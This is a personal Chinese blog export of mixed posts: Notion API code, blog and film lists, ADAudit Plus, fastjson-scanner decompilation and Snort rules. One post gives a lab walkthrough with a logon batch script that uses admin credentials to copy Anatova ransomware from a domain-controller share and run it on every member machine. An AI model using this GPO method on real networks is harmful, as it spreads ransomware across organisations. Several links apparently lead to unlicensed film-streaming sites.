3R1CCHENG

python与notion api实践

Sun, 10 May 2026 09:47:38 GMT

Notion API

官方文档

🔗 Notion API Overview

官方postman示例

🔗 Notion API | Notion's API Workspace

在postman中可以查询到大部分的请求

其中，有以下几个关键的参数需从自己的工作区获取

flowchart TD

	subgraph A[1、New Integrations]
  B([NOTION_API_KEY]) 
	end
	
	subgraph C[2、Notion Databases]
	D>database id]
	end 
	
	A -->|connect| C
	
	
	E -. 3、get .-> B
  E(python code) -. 3、get .-> D
  E --> |4、request|C

获取参数

Token(NOTION_API_KEY)

notion集成，或者叫notion整合

在 notino整合(notion integrations)中创建「新的整合」，命名为 new_integration ，获取此「内部整合密钥」即为 token (NOTION_API_KEY)

👆与database连接👇

获取到的NOTION_API_KEY就作为纽带，可以通过 API 与个人的工作区建立连接，但在此之前，需要先将个人的整合与工作区连接。

在数据库右上角菜单选择「连接」，搜索对应的整合名，建立连接

获取database id（DATABASE_ID）

右上角分享，「复制链接」

形如：https://www.notion.so/xxx/d3f42a0b8cxxx…xxxc1280552?v=e43d91fbxxx…xxx863230&pvs=4

获取到链接中 notion.so 和 ? 之间的id ，即为database id，例如以上示例中的d3f42a0b8cxxx…xxxc1280552

查询数据库

header

请求头中需要带上的参数

headers = {
        'Authorization': f'Bearer {NOTION_TOKEN}',
        'Notion-Version': '2022-06-28'
    }

2022-06-28是notion api的最新版本

def get_headers(include_content_type=False):
    headers = {
        'Authorization': f'Bearer {NOTION_TOKEN}',
        'Notion-Version': '2022-06-28'
    }
    if include_content_type:
        headers['Content-Type'] = 'application/json'
    return headers

database_query_url

url = f'https://api.notion.com/v1/databases/{databases_id}/query'

database_query()

具体的请求参见notion官方的postman工作区


def databases_query():
    headers = get_headers()
    databases_id = NOTION_DATABASE_ID

   
    url = f'https://api.notion.com/v1/databases/{databases_id}/query'
    response = requests.post(url, headers=headers)
    if response.status_code == 200:
        data = response.json()
        logger.debug(json.dumps(data, ensure_ascii=False, indent=4))
        return data
    else:
        logger.error(f"请求失败，状态码: {response.status_code}")
        return None

retrieve与query

在对databases和page的请求中，分为retrieve和query

databases

retrieve
获取 databases/pages 的属性，包括其title和property 选项，而不会返回 database/page 中的内容
```
url = f'https://api.notion.com/v1/databases/{databases_id}'
response = requests.get(url, headers=headers)
```

query

获取 databases/pages的内容及property内容

url = f'https://api.notion.com/v1/databases/{databases_id}/query'
response = requests.post(url, headers=headers)

pages

但实际上 databases 与 pages 的查询还是有一个区别，databases是通过以上所说的 retrieve和query分别获取属性和查询内容，但是官方提供的pages查询只有通过retrieve来获取属性，而要获取pages的内容则是通过retrieve blocks

retrieve

url = f'https://api.notion.com/v1/pages/{page_id}'

query

url = f'https://api.notion.com/v1/blocks/{page_id}/children?page_size=100'

创建pages等

此后的请求参考官方postman即可，关于字段如何构建，则可先在databases/pages中手动构建，再通过retrieve/query反推，这也是上文着重的原因

End

中文博客琅琊榜

Sun, 10 May 2026 09:47:38 GMT

中文博客琅琊榜

🔗

原文地址：

前言

中文博客琅琊榜，只收录优质的中文独立博客，全网最精品。已收录博客数量：328 个博客站点。

收录条件

收录条件：持续更新、高质量、阅读体验良好、最好提供RSS订阅链接。

欢迎提交 GitHub issues 进行补充。可以推荐别人的博客并附上真诚的推荐语，但不接受自荐。

阅读建议

随便挑选一个博客，都能让你徜徉一整天。《观念的力量》一书的前言有一段话，我将其进行改编：

这些博主才华横溢，满怀自由精神，他们的观念具有一种无法遏制的力量。我无比羡慕那些正准备阅读这些文章的人，他们面对的是一场精神的盛宴。

一、中流砥柱

阮一峰

博客地址：https://www.ruanyifeng.com/

擅长领域：JavaScript、ECMAScript、科技周刊等。

酷壳（陈皓/左耳朵耗子）

博客地址：https://coolshell.cn

骨灰级程序员。擅长领域：专注底层，C++，JAVA，UNIX/LINUX等。

和菜头：槽边往事

博客地址：https://www.hecaitou.com/

在今天重新审视博客，发现博客还是有其他互联网产品所替代不了的优势。详见文章：《重开博客》

王垠

博客地址：

当然我在扯淡：https://www.yinwang.org
王垠的草稿本：https://yinwang1.wordpress.com

云风

博客地址：https://blog.codingnow.com/

王五四文集

博客地址：http://wang54.blogspot.com/

卢昌海

博客地址：https://www.changhai.org

物理学博士，科普作家。复旦大学物理系 (本科)，哥伦比亚大学物理系 (博士)。

魏武挥

扯氮集：http://weiwuhui.com/

魏老师执教于上海交通大学媒体与传播学院，天奇创投基金管理合伙人。媒体行业的思考和见解，尽在魏老师。

郝海龙

博客地址：https://haohailong.net/

《林中来信》出品人，长期从事出国考试培训和咨询业务。

李如一

一天世界：https://blog.yitianshijie.net/
Apple4us（不再更新）：https://apple4us.com/

《一天世界》《滅茶苦茶》《無次元》作者；IPN（播客网络）创始人；唐茶（字节社）创始人。

二、综合博主

PlatyHsu

博客地址：https://type.cyhsu.xyz

Mac、软件、译文。站在科技和人文的交叉路口。

PlatyHsu 从2015年开始写博客，至今有100多篇文章（中文为主）；他用英文写 about 页面，且毫无保留；他的 newsletter 会推送每天正在阅读的英文资讯。

他的博客网站，名字叫 Neverland，意思是：你永远不要期望从中得到一些有用的东西，但你也不可能永远找不到。

评论尸

虹线-评论尸的自留地：https://1q43.blog/

公众号“赤潮AKASHIO”，播客“二维吾码”主理人。

代表作：

《互联网是人类历史的一段弯路吗？》：5万字，收录于《读库2005》；
《垄断的困境》：6万字，收录于《读库2105》
《互联网与中国后现代性呓语》：8万字，收录于《读库2204》。

Camellia Yang 翊瑄

博客地址：https://www.camelliayang.com/

作者的创作聚焦生活方式、东西方哲思和奇怪的短篇小说，从去年开始中英文同时创作，包括公众号、邮件订阅、双语播客等等。

1988年出生于中国山东济南；2007年被山东财经大学录取；2010年在中国获得英国文学和国际商务哲学硕士学位，然后搬到新西兰奥克兰；2013年在新西兰航空公司担任社交媒体专家；2015年辞去工作，环游世界；2021年作为一个数字游牧者，在英格兰、拉脱维亚和葡萄牙与三大洲的客户进行远程工作；2022年搬到葡萄牙，以艺术的方式生活。

其他链接：

公众号/播客：理想屯
Twitter：Camellia Yang 翊瑄

天仙子（秦海碗）

博客地址：https://tianxianzi.me/

一个充满思考、文字气息的博客，内容十分丰富，日记、随笔、小说、诗歌、书影音，当然还有作者喜欢的酒。

我选择了一个很素净的网站主题，像是印刷品，也像是信纸。在这样的主题下写作就像在文中那个被积雪压弯了屋顶的小屋里写作，很安静。这个网站也是我直接与你对话的方式。我没有设置评论区（尽管这个主题有这功能），正是因为我希望自己是在与你们每一个人对话。这个网站连接的只有我和你，没有其他人。我希望这是在和你促膝谈心。

心的道理

博客地址：https://stephenleng.com/

冷金乘，中文网名是浮云笑此生。作者是浙江大学历史学院博士生，现为美国弗吉尼亚大学访问学者，学术兴趣为思想史、情绪史、历史哲学、人文主义哲学和心理学。博客创作的内容包含随笔、文化批评、心理学、国际问题和技术，希望能分别从科学和艺术两个角度兴起读者对生活的感悟，并着重批判当代文化中的一些谬误、偏见、狂妄、愚蠢和欺骗。

关于本博客的创作宗旨，可参考这篇文章。本博客面向的预期读者是全世界能够使用中文的人，包括简体中文和繁體中文（或正體中文），包括母语和非母语。希望它创作的内容能得到普遍性的理解甚至共鸣，而不是局限于一时一地的特殊情况。

Luyao Zhang

博客地址：https://zhangluyao.com/

这些年用自己的域名写 blog 的人不多了。其中有一些文章写的真好。尤其是那种深深的有趣感，是我很久没有感觉到的。

happy xiao

博客地址：https://happyxiao.com

关注的领域很广：流行哲学、数码产品、应用、Apple、阅读、创作视频、播客、blog、打篮球、跑步。

博客、播客、视频、newsletter、twitter均值得关注。

尺宅叟

尺宅杂记：http://www.qncd.com/

尺宅叟，一枚前——愤青、伪文青、互联网从业者、创业总是失败者、攻城狮、自由撰稿人、摄影师、杂志主编和独立Blogger；从2002年至今，在各类媒体发表二十余万字、百余幅摄影作品。现为摆脱后工业时代职业束缚的斜杠多重职业者，以及常常一个人活成一支队伍的中年生活幸存者。

以下推荐语，摘自@为也行：

一个我很喜欢的博客，博主是一位老师，频繁在博客更新他的阅读书籍、备课、与学生的互动趣事。

我印象很深的是，他曾说他这个学历不高的人，能当上教师，仅仅是比别人多读了一千本书而已。当然，这只是谦虚之词。

他家里藏书上千本，全家有良好的读书氛围，女儿小学年纪，热爱读书，沉迷其中，又得到家庭的支持，年纪轻轻就博览群书，这种无忧无虑的读书氛围，让我非常羡慕。

COIN DOLLAR PAY

博客地址：https://coindollarpay.com/

王佩的白板报

博客地址：

白板报：https://wangpei.net/
王佩的白板报：https://wangpei.me/

王佩老师是著名编剧、自由撰稿人。他从1998年开始在互联网上写作，并以幽默作家的身份走红，被戏称为“红心杀手”。他也是一个忠实的博客作者。他的博客“白板报”网站自2004年以来一直在更新。

kaix.in

博客地址：https://kaix.in/
RSS订阅

因多次更换 blog 程序，2004 年至今存留 548 篇日志，主要涉及咖啡、影音、阅读、生活记录等内容。

Linmi

博客地址：https://linmi.cc/

Notion 中文社区负责人。95 后，男生，驻京六年。主职是一名运营，从业六年，在技术社区从业已四年半，其中技术知识付费领域已两年半，擅长技术知识付费内容生产，社区运营、增长与 SEO、技术 KOL 培养与运营、线下活动组织等。当然能力边界不止开发者这一垂直领域。目前在某大厂运营某项目管理工具。

菲林之间

Sun, 10 May 2026 09:47:38 GMT

除了太阳高度今晚的写作还取决于天气状况、污染、悬浮颗粒物孩子们睡得很好孩子们还在密蓝里游玩以后我会教他们算术一朵花加上一朵花等于一朵喇叭花一只甲壳虫减去一只甲壳虫等于一条毛毛虫我写信的时候心脏是热的和想你的时候一样所以我想人类的爱肯定保存太阳的核心之中用来维持着太阳系

————出自：毕赣《破碎太阳之心》

🤔 一个浴中奇思

假如，人生重来一次，虚度此生后，有哪些电影是你想要看抑或是不可错过的？

于是，便产生了这篇，非常个人向，并不权威的电影TOP。

📝约法三章

一不评分

二不排序

三分级别——偏爱、喜爱、认可。

🤩

偏爱即是个人最爱，此不以艺术水平、普世价值为主要标准，仅以个人审美及趣味为准，敝帚自珍，多半因经历镌刻。年华似水，东去不回。

☺️

喜爱则是均衡电影艺术水平、个人趣味，二者均有高度，但未达到奉为圭臬的程度。

🤗

认可意指电影艺术水平较高，个人不喜不厌，认为即使个人不钟爱也应当为其留有一席之地的。

当然，后两者讨论艺术水平都是刍荛之见，管窥蠡测，君请一笑了之。

🤩偏爱

Scent of a Woman

Scent of a Woman
1992
2h 36m
Director
Martin Brest
Writers
Giovanni Arpino
Bo Goldman
Ruggero Maccari
Stars
Al Pacino
Chris O'Donnell
James Rebhorn

🗣

Outta order? I'll show you outta order! You don't know what outta order is, Mr. Trask! I'd show you but I'm too old; I'm too tired; I'm too fuckin' blind. If I were the man I was five years ago I'd take a FLAME-THROWER to this place!

一个因不愿出卖朋友而被威胁取消奖学金并勒退高级中学的优秀青年，一个因失去人生光明而计划走完人生最后一遭的失意暴躁中校，两个徘徊于人生十字路口的中青年，彼此挽救、彼此指引…

🕴️

Some people live a lifetime in a minute.

💃

No mistakes in the tango, not like life. If you make a mistake, get all tangled up, just tango on.

西班牙探戈舞曲「Por una Cabeza」（一步之遥）徐徐响起，探戈不像生活，探戈没有错误，如果你踏错了步，尽管继续探戈。尽管如此，生活也可以像泰戈尔说的，「尽管走下去，不必逗留着，去采鲜花来保存，因为在这一路上，花朵自然会继续开放」。

阿尔帕西诺再次贡献垂名影史的教科书式表演，失焦的眼神，对失明的演绎入木三分。细致的形体掌握和深厚的台词功底，完美诠释了一个暴躁、骄傲、勇敢、话唠、极度自尊、孤独、无助、失落、彷徨、坚毅、绅士、温暖、迅猛、不怒自威的复杂而又和谐的形象。

众望所归，终于凭此片中的表演在1993年拿回奥斯卡男主角金人。标志性的「Woo-Hah」，罗宾威廉姆斯在阿尔的美国电影学会终生成就颁奖致辞说道，「这甚至不算一个词组…你因此却获得了奥斯卡！」

PS：刚好避开了神仙打架的1994年，否则这个姗姗来迟的小金人不知道是否会一迟到底呢。

是的，我毫不掩饰对阿尔的喜爱，还有「Godfather」（教父）、「Scarface」（疤面煞星）、「Dog Day Afternoon」（热天午后）、「Insomnia」（失眠症）、「The Irishman」（爱尔兰人），先按下稍后再表。

地球最后的夜晚

如果我可以选择让哪一部电影在影院重映，我一定会选的就是这部…

关于这部影片，讨论最多的大概就是以爱情片噱头宣传的文艺片，其中首映特别排了一场12月31号21:50的，原因是这样在刚好12点跨年之际，电影镜头恰好是男女主角之吻，就是凭着“一吻跨年”的浪漫宣传，热恋中的青年情侣带着浪漫与期待被“骗”进了电影院，继而收割了大半场的昏昏欲睡和骂骂咧咧。

《地球最後的夜晚》定於2018年12月31日在中國大陸公映，2018年12月7日，在片方發布的一張公告上，電影出品方打出了「一吻跨年」的口號，鼓勵觀眾買下12月31日21：50的場次，「與最重要的人一起度過一個最有儀式感的夜晚」，這一宣傳活動通過抖音、微博等廣泛流行的社交軟體迅速傳播，吸引大批觀眾購票進場。12月19日，影片票房已突破6000萬人民幣，創造中國文藝電影預售票房新紀錄，最終預售票房達1.59億人民幣，其中12月31日晚跨年場更出現「一票難求」的情況。然而，由於影片節奏緩慢、觀影門檻較高，與大多數普通觀眾的觀感不符，許多並非文藝片受眾的觀眾評價該片「沉悶無聊、不知所云」，在以購票者評分為主的猫眼電影創下了2.6分的史上最低評分。影片票房及排片在跨年場之後出現了斷崖式下跌，票房由首日的2.6億元人民幣暴跌至1100餘萬元人民幣，次日跌幅高達95.7%，上映第三天已縮水至不足兩百萬人民幣。該片的全國院線排片率從首日的34.1%降到第二天的13.7%，上座率更是從46.4%降到5.2%。有評論指該現象是「過度營銷造成的口碑反噬」。 ———from wikipedia(https://zh.wikipedia.org/wiki/地球最後的夜晚#票房)

当年上映的时候我对于电影还不大关注，只知道「最近」有一个电影，未曾想过这是什么电影，未想过是否值得一看，更未想过会因为骂声一片、票房不佳、上座率太低等原因在短时间内从影院下架。

后来过年时，我不记得我是因为看到了很多相关的讨论，还是因为太过无聊，找了这部电影来看，我清楚地记得，当时盗摄盛行，影院无排片，媒体无资源，我竟然用手机看完了枪版的电影，模糊而又重影的画面、糟糕的收音，138分钟，复杂的剧情、梦幻的体验，我有点昏昏欲睡，直到最后几分钟主题音乐响起，爱人的房子在咒语中旋转起来，我受到深深的震撼……

前半部分2D是现实，后半部分3D是梦境，而前半部分插叙交代两个年代的所有剧情，故事需要在这部分寻找线索组成，再交由后半部分的梦境糅杂。

整片大量堆叠的意象，绿色与红色、野柚子、时钟、老鹰、水与火、KTV、乒乓球、苹果和蜂蜜等等在梦境与现实中穿插，由现实拼凑出梦境，由梦境填补现实。

通过域控下发病毒程序

Sun, 10 May 2026 09:47:38 GMT

📖

通过域控执行病毒程序（以勒索软件为例）

0x01 攻击方法

域控下发策略，域成员登录时，执行域控提前部署好的bat脚本，通过此脚本，IPC连接到域控，copy文件后执行命令，在成员机器上执行

0x02 具体步骤

1. 主机加入到域控

1.1 更改网络

更改主机网络，dns为域控的IP（域控同时也是dns服务器）

确保能和域控通信

1.2 更改系统属性

将其更改为隶属于域

1.3 输入域名和密码

后就可以加入域了

1.4 重启

重启后就加入域了

1.5 成功

之后在 Active Directory 就可以看到该计算机了

2. 开启IPC共享

将测试样本放在共享目录下

3. 存放测试文件

如果本机上有存在docx等文件，可略过此步骤

在DPtest目录下存放三个文件

内容

4. 组策略配置

4.1 新建OU

OU 即 Organization Unit，组织单位。

4.2 新建用户

然后在OU内新建用户

密码为 Admin123

在这里用新用户登录域成员主机，用于存放测试文件

4.3 添加策略对象和bat

然后打开组策略管理(gpmc.msc),右键组策略对象——新建名为ADControl的策略对象右键ADControl—编辑—用户配置—策略—windows设置—脚本—登录—显示文件—新建dptest.bat bat内容：

@echo off

REM 建立网络连接
net use \\192.168.249.227 Admin123 /user:administrator

REM 复制文件
copy \\192.168.249.227\rs\Anatova.exe c:\Users\gpo2\Desktop\

REM 执行可执行文件
cmd /c c:\Users\gpo2\Desktop\Anatova.exe

REM 断开网络连接
net use * /del /y

REM 结束脚本
exit

然后添加—浏览—选择dptest.bat

4.4 链接到GPO

在组策略管理器，右键OU——链接现有GPO——选择ADcontrol

4.5 刷新组策略

gpupdate /force

4.6 登录账户

使用新建的账户gpo2登录，域控即下发策略执行bat文件，下载勒索软件并执行

ADAudit Plus浅析

Sun, 10 May 2026 09:47:38 GMT

📖

简单分析了ADAudit Plus的产品逻辑

ADAudit Plus是一款基于Web的活动目录变更审计和报表解决方案，可帮助管理员审计和跟踪Windows活动目录中的所有变更，诸如用户、计算机、组、域策略变更和登录行为等，并通过丰富直观的报表呈现。此外，还可以对变更行为配置告警，及时通知管理员。

整体架构跟EventLog Analyzer类似，都是从windows eventlog中取日志存入pgsql数据库，利用xml文件对日志进行解析分类并生成各类报表。区别于数据库审计日志的关键是此处的日志策略是通过新建一个组策略对象和修改一个磨人的组策略对象设置的。

日志来源

域设置→事件日志属性

报表→高级DNS服务器审计来源：

%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-DNSServer%4Audit.evtx

服务器审核→Powershell审计来源：

%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

配置文件

在 \ManagerEngine\ADAudit Plus\conf 目录中有大量的xml文件，用于解析日志中的字段，例如 kerberos-error-codes.xml 文件解析日志中 kerberos 认证错误代码的含义，如当error_code为 0x18 时，代表此错误是密码错误

与日志中的kerberos登录密码错误的信息一致

event-id.xml中记录了所有类别的eventid

策略更改

查看域控的策略， auditpol/get /category:*

安装ad之后

C:\Users\Administrator>auditpol/get /category:*                                                                         系统审核策略                                                                                                            类别/子类别                                    设置                                                                     系统                                                                                                                      安全系统扩展                                  无审核                                                                    系统完整性                                   成功和失败                                                                 IPsec 驱动程序                              无审核                                                                      其他系统事件                                  成功和失败                                                                安全状态更改                                  成功                                                                    登录/注销                                                                                                                 登录                                      成功和失败                                                                    注销                                      成功                                                                          帐户锁定                                    成功                                                                        IPsec 主模式                               无审核                                                                       IPsec 快速模式                              无审核                                                                      IPsec 扩展模式                              无审核                                                                      特殊登录                                    成功                                                                        其他登录/注销事件                               无审核                                                                  网络策略服务器                                 成功和失败                                                               用户/设备声明                                 无审核                                                                    组成员身份                                   无审核                                                                   对象访问                                                                                                                  文件系统                                    无审核                                                                      注册表                                     无审核                                                                       内核对象                                    无审核                                                                      SAM                                     无审核                                                                          证书服务                                    无审核                                                                      已生成应用程序                                 无审核                                                                   句柄操作                                    无审核                                                                      文件共享                                    无审核                                                                      筛选平台数据包丢弃                               无审核                                                                 筛选平台连接                                  无审核                                                                    其他对象访问事件                                无审核                                                                  详细的文件共享                                 无审核                                                                   可移动存储                                   无审核                                                                     中心策略暂存                                  无审核                                                                  特权使用                                                                                                                  非敏感权限使用                                 无审核                                                                   其他权限使用事件                                无审核                                                                  敏感权限使用                                  无审核                                                                  详细追踪                                                                                                                  进程创建                                    无审核                                                                      进程终止                                    无审核                                                                      DPAPI 活动                                无审核                                                                        RPC 事件                                  无审核                                                                        “即插即用”事件                                无审核                                                                  Token Right Adjusted Events             无审核                                                                        策略改动                                                                                                                  审核策略更改                                  成功                                                                      身份验证策略更改                                成功                                                                    授权策略更改                                  无审核                                                                    MPSSVC 规则级别策略更改                         无审核                                                                  筛选平台策略更改                                无审核                                                                  其他策略更改事件                                无审核                                                                帐户管理                                                                                                                  计算机帐户管理                                 成功                                                                     安全组管理                                   成功                                                                       分发组管理                                   无审核                                                                     应用程序组管理                                 无审核                                                                   其他帐户管理事件                                无审核                                                                  用户帐户管理                                  成功                                                                    DS 访问                                                                                                                   目录服务访问                                  成功                                                                      目录服务更改                                  无审核                                                                    目录服务复制                                  无审核                                                                    详细的目录服务复制                               无审核                                                               帐户登录                                                                                                                  Kerberos 服务票证操作                         成功                                                                      其他帐户登录事件                                无审核                                                                  Kerberos 身份验证服务                         成功                                                                      凭据验证                                    成功

C:\Users\Administrator>auditpol/get /category:*                                                                         系统审核策略                                                                                                            类别/子类别                                    设置                                                                     系统                                                                                                                      安全系统扩展                                  成功                                                                      系统完整性                                   成功和失败                                                                 IPsec 驱动程序                              无审核                                                                      其他系统事件                                  无审核                                                                    安全状态更改                                  成功                                                                    登录/注销                                                                                                                 登录                                      成功和失败                                                                    注销                                      成功                                                                          帐户锁定                                    无审核                                                                      IPsec 主模式                               无审核                                                                       IPsec 快速模式                              无审核                                                                      IPsec 扩展模式                              无审核                                                                      特殊登录                                    成功和失败                                                                  其他登录/注销事件                               成功和失败                                                              网络策略服务器                                 成功和失败                                                               用户/设备声明                                 无审核                                                                    组成员身份                                   无审核                                                                   对象访问                                                                                                                  文件系统                                    无审核                                                                      注册表                                     无审核                                                                       内核对象                                    无审核                                                                      SAM                                     无审核                                                                          证书服务                                    成功和失败                                                                  已生成应用程序                                 成功和失败                                                               句柄操作                                    无审核                                                                      文件共享                                    无审核                                                                      筛选平台数据包丢弃                               无审核                                                                 筛选平台连接                                  无审核                                                                    其他对象访问事件                                成功                                                                    详细的文件共享                                 无审核                                                                   可移动存储                                   成功和失败                                                                 中心策略暂存                                  无审核                                                                  特权使用                                                                                                                  非敏感权限使用                                 无审核                                                                   其他权限使用事件                                无审核                                                                  敏感权限使用                                  无审核                                                                  详细追踪                                                                                                                  进程创建                                    成功                                                                        进程终止                                    成功                                                                        DPAPI 活动                                无审核                                                                        RPC 事件                                  无审核                                                                        “即插即用”事件                                成功和失败                                                              Token Right Adjusted Events             无审核                                                                        策略改动                                                                                                                  审核策略更改                                  无审核                                                                    身份验证策略更改                                成功                                                                    授权策略更改                                  成功                                                                      MPSSVC 规则级别策略更改                         无审核                                                                  筛选平台策略更改                                无审核                                                                  其他策略更改事件                                无审核                                                                帐户管理                                                                                                                  计算机帐户管理                                 成功                                                                     安全组管理                                   成功                                                                       分发组管理                                   成功                                                                       应用程序组管理                                 无审核                                                                   其他帐户管理事件                                无审核                                                                  用户帐户管理                                  成功和失败                                                              DS 访问                                                                                                                   目录服务访问                                  成功                                                                      目录服务更改                                  成功                                                                      目录服务复制                                  无审核                                                                    详细的目录服务复制                               无审核                                                               帐户登录                                                                                                                  Kerberos 服务票证操作                         无审核                                                                    其他帐户登录事件                                成功和失败                                                              Kerberos 身份验证服务                         成功和失败                                                                凭据验证                                    无审核

产品新建了一个组策略对象GPO——ceshi.com_ADAuditPlusPolicy ，并且更改默认的域控策略，根据这些策略，事件日志中会记录对应的日志，再由ADAudit Plus记录解析。

美美与共

Sun, 10 May 2026 09:47:38 GMT

网易云7天会员（202602）

观影

gying小站
https://教父.com
https://星际穿越.com
https://楚门的世界.com
https://泰坦尼克号.com
https://盗梦空间.com
https://肖申克的救赎.com
https://阿甘正传.com
https://黑客帝国.com

可在线欣赏

🔗 网飞猫_最新Netflix新剧_韩国电影免费在线观看

‣
‣
555电影

网盘搜索

种子/网盘

字幕

字幕库

fastjson漏洞检测工具反编译

Sun, 10 May 2026 09:47:38 GMT

对某司的fastjson专项漏洞检测工具进行反编译

反编译（pyinstxtractor）

使用 pyinstxtractor.py 文件即可对使用pyinstaller打包的 .exe文件进行反编译

下载地址：

🔗 PyInstaller Extractor

在待解压exe文件同级目录下，运行

python pyinstxtractor.py fastjson漏洞检测工具.exe

可以看到会新增一个fastjson漏洞检测工具.exe_extracted 文件夹

其中有一个 .exe.mainfest 后缀的文件，以及同名的无后缀文件，这个同名无后缀文件就是原本的py文件，这个文件的名字不同于exe文件名，其才是开发时真正的py文件名

然后这个文件是无法直接反编译的，这是因为其文件头被删去了一些字节，需要对其还原

将struct文件更改为struct.pyc 文件，上传到https://tool.lu/pyc/ 或者 https://www.toolnb.com/tools/pyc.html 这个网站进行解密，发现可以解密，说明此文件的文件头是完整的

只需要利用十六进制编辑器，将此文件完整头填充到 fastjson34xp 头中，改为 .pyc文件即可反编译出来（前12位）

代码

然而，使用不同网站/工具反编译出的代码略有偏差，部分函数和代码甚至有些影响审计，在查阅相关代码知识之外，不得不忽略一些无法理解的代码，这里梳理一下大概思路

main函数先输出一个title

title = ''
    title += '\n此工具将检测jar/war文件中是否存在 包含fastjson 1.2.83 以下漏洞版本组件'
    title += '\n如检测到请升级至 1.2.83版本以上:'
    print(title)

定义一个空列表 drivers

for循环遍历盘符A-Z:// 赋给vol，盘符路径存在则存进drivers

drives = []
    for i in range(65, 91):
        vol = chr(i) + '://'
        if os.path.isdir(vol):
            drives.append(vol)
            continue

然后用lambda 函数遍历打印盘符

print('\n发现待搜索分区:  ' + ', '.join((lambda .0: [ d for d in .0 ])(drives)))

定义一个测试路径test_dir 和空列表 jar_list

test_dir = 'D:\\example\\en_test\\work\\fastjson\\safe_1.2.83\\jar'
    jar_list = []

扫描drivers 下所有 .jar 和 .war 文件，存进jar_list 列表中，tqdm打印进度条

drtqdm = tqdm(desc = '全盘搜索所有jar/war文件中...', unit = '个文件')
    for dr in drives:
        for parent, dirnames, fnms in os.walk(dr, followlinks = True):
            for fnm in fnms:
                drtqdm.update(1)
                if not fnm[-4:] == '.jar':
                    if fnm[-4:] == '.war':
                        jar_list.append(os.path.join(parent, fnm))
                        continue
            drtqdm.close()
            print('完成,共%d个jar/war文件' % len(jar_list))

接着调用rg_jar 函数，传入jar/war 文件路径，嵌套调用 ch_jar 函数，这里会有一个是否存在zip文件的判断，之后将所有 jar/war 文件与定义好的列表（含有漏洞的fastjson版本jar包）进行正则匹配，命中正则则返回数据写入data，之后写入扫描结果.txt 中（这部分代码较长不一一展开了）

总结

这个工具思路是扫描文件系统所有文件，匹配存在漏洞版本的jar包依此做判断而已

snort中的byte_test\extract\jump

Sun, 10 May 2026 09:47:38 GMT

byte_test

参考：

http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node32.html

取测试值与给定值进行运算操作，结果为true则命中

格式

byte_test:<bytes_to_convert>,[!]<operator>,<value>,<offset>[,<relative>]\
				[,<endian>][,string,<number type>][,dce][,bitmask<bitmask_value>];

其中：

byte_to_convert 从数据包取得的字节数 = 1-10

ps：不使用dce时可使用的值为1-10，使用dce时的值为1，2，4

operator 对测试值执行的操作 = < = > <= >= & ^ 也就是等于还是小于大于.....

value 与测试值进行比较的转换后的值 = 0-4294967295

offset 偏移量 = -65535-65535

relative 使用相对于上一个模式匹配的相对偏移

举个栗子

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"AMD procedure 7 plog overflow "; content:"|00 04 93 F3|"; content:"|00 00 00 07|"; distance:4; within:4; byte_test:4,>,1000,2,relative;)

relative的作用是使用一个相对于上一个content的相对偏移量。即在上一个匹配到的|00 00 00 07|后面，偏移2个字节后，取其后4个字节转换成二进制与二进制的1000比较，匹配操作返回true，即命中。

byte_extract

取得一定长度的数据保存到一个变量中，以便在后续规则中使用，而不是使用硬编码值，一般与byte_test结合在一起

格式

byte_extracr:<bytes_to_convert>,<offset>,<name>,[,<relative>]\
					[, multiplier <multiplier value>][, <endian>][, string][, hex][, dec][, oct] \
	        [, align <align value>][, dce][, bitmask <bitmask>];

byte_to_convert 从数据包取得的字节数

offset 偏移量

name 给取得的变量命名

relative 使用相对于上一个模式匹配的相对偏移

举个栗子

例如有tcp流中开头的hex转储数据如下（CVE-2016-8706）

80 21 00 20 00 00 00 01  00 00 00 01

其中，如果想要对 0x0020 和 0x00000001 两个变化的值进行比较（假定触发漏洞需要后者比前者值小），相对应的规则可以如此

content:"|80 21|"; offset:0; depth:2; byte_extract:2,0,keylen,relative; byte_test:4,<,keylen,0,relative;

byte_extract 对content之后偏移 0 个字节取 2 个字节的值，命名为keylen，此时keylen 的值为00 20 ，后续的byte_test 对byte_extract 之后偏移 0 个字节取4个字节的值，即为00 00 00 01 ，判断 < 逻辑成立，结果为true，规则命中。

byte_jump

取对应偏移位置上的值，跳过payload中对应该值数目的字节

米店

Sun, 10 May 2026 09:47:38 GMT

https://embed.notion.co/api/iframe?url=https%3A%2F%2Fwww.bilibili.com%2Fvideo%2FBV1Ko4y1r7Qu%2F&key=656ac74fac4fff346b811dca7919d483

🔗 又是一年米店月！老狼翻唱经典民谣《米店》原唱张玮玮手风琴伴奏，希望春暖花开早日到来~_哔哩哔哩_bilibili

「三月的烟雨，飘摇的南方，你坐在你空空的米店。」

外公有一个米店，那是我小时候对外公的记忆。

关于米店，我的脑海中总会浮现小时候我跑到车水马龙的大公路边，公路对面的米店里，外公站着在店面，四下观望，偶尔能发现我，我们就会遥望呼喊打招呼。现在外公没有米店了，他不在店面踌躇，我每次回家会来找他坐，天气好的时候我们会在家门口坐着，晒太阳。

记忆中，外公似乎总是穿着黑色的大衣，黑色的西装长裤，戴着一顶黑色的宽檐平顶毛毡帽。还有一辆二八大杠，因此在乡里他去哪里大概都是不用搭公车的，甚至年轻时为了谋生做生意，还骑着自行车去了更远的隔壁县市。而我所说的米店，已经是外公人生经历中做的最后一次生意了，后来去了舅舅的石铺做监理，直到“退休”居家。

外公做了很多生意，一生中经历了很多的工作。年轻的时候种过田，也去挖过藕，挖完用他的二八大杠，运藕回来卖，又从哪里运橘子到哪里卖，这都是临时的工作。后来在居委大队又得了份差，因为误会还经历过惊险时刻。（好多都忘了）

我喜欢听历史，我对外公的经历很感兴趣，我往前一推算，耄耋之年的他比共和国更年长，那他肯定经历过那段动荡又传奇的年代。从我问他新中国开始，他跟我说抗日战争，潮汕作为被日寇侵占沦陷之地，当战争胜利之时，他见到过小鬼子落荒乘船而逃；土地改革的时候，他说本地的地主被拉去枪毙，还是小孩子的他也爱凑热闹；十年期间，他讲谁被批斗了，谁逃了藏了，藏到自己的根据地，没人找得到，风波过后谁做主了才又出来；也才来到了改革开放。

小时候，家里是白天与黑夜；高中时，家里是每个周末；读大学时，家乡只有夏天和冬天；工作之后，故乡是过年、国庆和五一。我每次回家都回去找外公外婆叙旧叨唠，前几年我回家去找二老时，他们总会重复问我一样的问题，想必是不记得上次说的了。几次之后我觉得很有意思，仿佛在重复做任务，我也孜孜不倦解释给他们听。

